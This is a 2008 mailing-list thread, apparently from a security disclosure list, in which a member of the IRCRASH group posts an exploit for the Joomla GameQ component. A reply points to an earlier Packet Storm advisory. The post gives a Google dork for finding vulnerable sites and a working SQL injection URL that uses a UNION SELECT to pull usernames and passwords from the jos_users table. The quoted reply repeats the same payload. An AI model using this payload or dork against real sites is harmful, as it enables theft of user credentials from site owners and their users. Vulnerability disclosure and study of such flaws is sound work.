Joomla Component GameQ

2008-12-04 Thread r3d . w0rm 
#
Joomla Component GameQ  
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : http://joomlacode.org/gf/project/gameq  
#
#   
#
#DORK : inurl:option=com_gameq  
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##

Re: Joomla Component GameQ

2008-12-04 Thread packet 
Already discovered:


http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 
6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and 
below suffer from a SQL injection vulnerability.  Authored By a 
href=mailto:His0k4.hlm[at]gmail.com;His0k4/a


On Thu, Dec 04, 2008 at 08:20:16AM -0700, [EMAIL PROTECTED] wrote:
 #
 Joomla Component GameQ

 #
 # 
   #
 #AUTHOR : Sina Yazdanmehr (R3d.W0rm)  
   #
 #Discovered by : Sina Yazdanmehr (R3d.W0rm)   
   #
 #Our Site : Http://IRCRASH.COM
   #
 #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi 
   #
 #
 # 
   #
 #Download : http://joomlacode.org/gf/project/gameq
   #
 # 
   #
 #DORK : inurl:option=com_gameq
   #
 # 
   #
 #
 #   [Bug] 
   #
 # 
   #
 #http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/*
 # 
   #
 #
 #   Site : Http://IRCRASH.COM 
   #
 ## TNX GOD 
 ##